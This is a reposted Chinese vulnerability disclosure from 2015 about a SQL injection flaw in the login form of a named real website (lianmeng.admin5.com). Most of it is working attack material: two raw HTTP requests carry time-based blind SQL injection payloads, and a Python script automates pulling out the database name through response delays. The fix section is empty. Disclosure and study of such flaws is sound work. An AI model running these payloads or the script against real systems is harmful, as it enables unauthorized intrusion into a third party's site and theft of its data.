记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

A5站长网某站存在SQL注入漏洞(附验证脚本)

2015-10-29 06:20

code 区域
POST /Login/login HTTP/1.1

Host: lianmeng.admin5.com

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%221c320e29cca506504514677a0d5fd96d%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%22210.74.157.98%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A65%3A%22Mozilla%2F5.0+%28Windows+NT+5.1%3B+rv%3A40.0%29+Gecko%2F20100101+Firefox%2F40.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1445589426%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Db420bfdef11a47e249791b34c8cf9b670d135b57; CNZZDATA1253702959=369810679-1445589126-%7C1445589126

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 106



change=&password=g00dPa%24%24w0rD&username='XOR(if(now()=sysdate(),SLEEP(IF(length(database())=11,5,0)),0))OR'

延迟注入



为真时,延迟5秒,db长度为11:

31.png

为假时,不延迟:

32.jpg



db的第一位为l(ascii:108)

code 区域
POST /Login/login HTTP/1.1

Host: lianmeng.admin5.com

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%221c320e29cca506504514677a0d5fd96d%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%22210.74.157.98%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A65%3A%22Mozilla%2F5.0+%28Windows+NT+5.1%3B+rv%3A40.0%29+Gecko%2F20100101+Firefox%2F40.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1445589426%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Db420bfdef11a47e249791b34c8cf9b670d135b57; CNZZDATA1253702959=369810679-1445589126-%7C1445589126

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 114



change=&password=g00dPa%24%24w0rD&username='XOR(if(now()=sysdate(),SLEEP(IF(ascii(mid(database(),1,1))=108,5,0)),0))OR'

35.png

40.png

code 区域
#encoding=utf-8





import httplib



import time



import string



import sys



import random



import urllib



import math





headers = {'Content-Type':'application/x-www-form-urlencoded'}



payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'







print 'Start to retrive MySQL DB:'







db= ''







for i in range(1, 12):







for payload in payloads:







#time.sleep(5) #5秒来一发



s = "change=&password=g00dParD&username='XOR(if(now()=sysdate(),SLEEP(IF(ascii(mid(database(),%s,1))=%s,3,0)),0))OR'" % (i, ord(payload))



conn = httplib.HTTPConnection('lianmeng.admin5.com', timeout=150)



conn.request(method='POST',



url='/Login/login',



body=s,



headers=headers)



start_time = time.time()



conn.getresponse()



conn.close()



print '.',





if time.time() - start_time > 3.0:



db += payload



print '\n\n[in progress]', db,



break





print '\n\n[Done] MySQL DB is %s' % db

漏洞证明:

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2015-0149010

阅读:115903 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“A5站长网某站存在SQL注入漏洞(附验证脚本)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云

本页关键词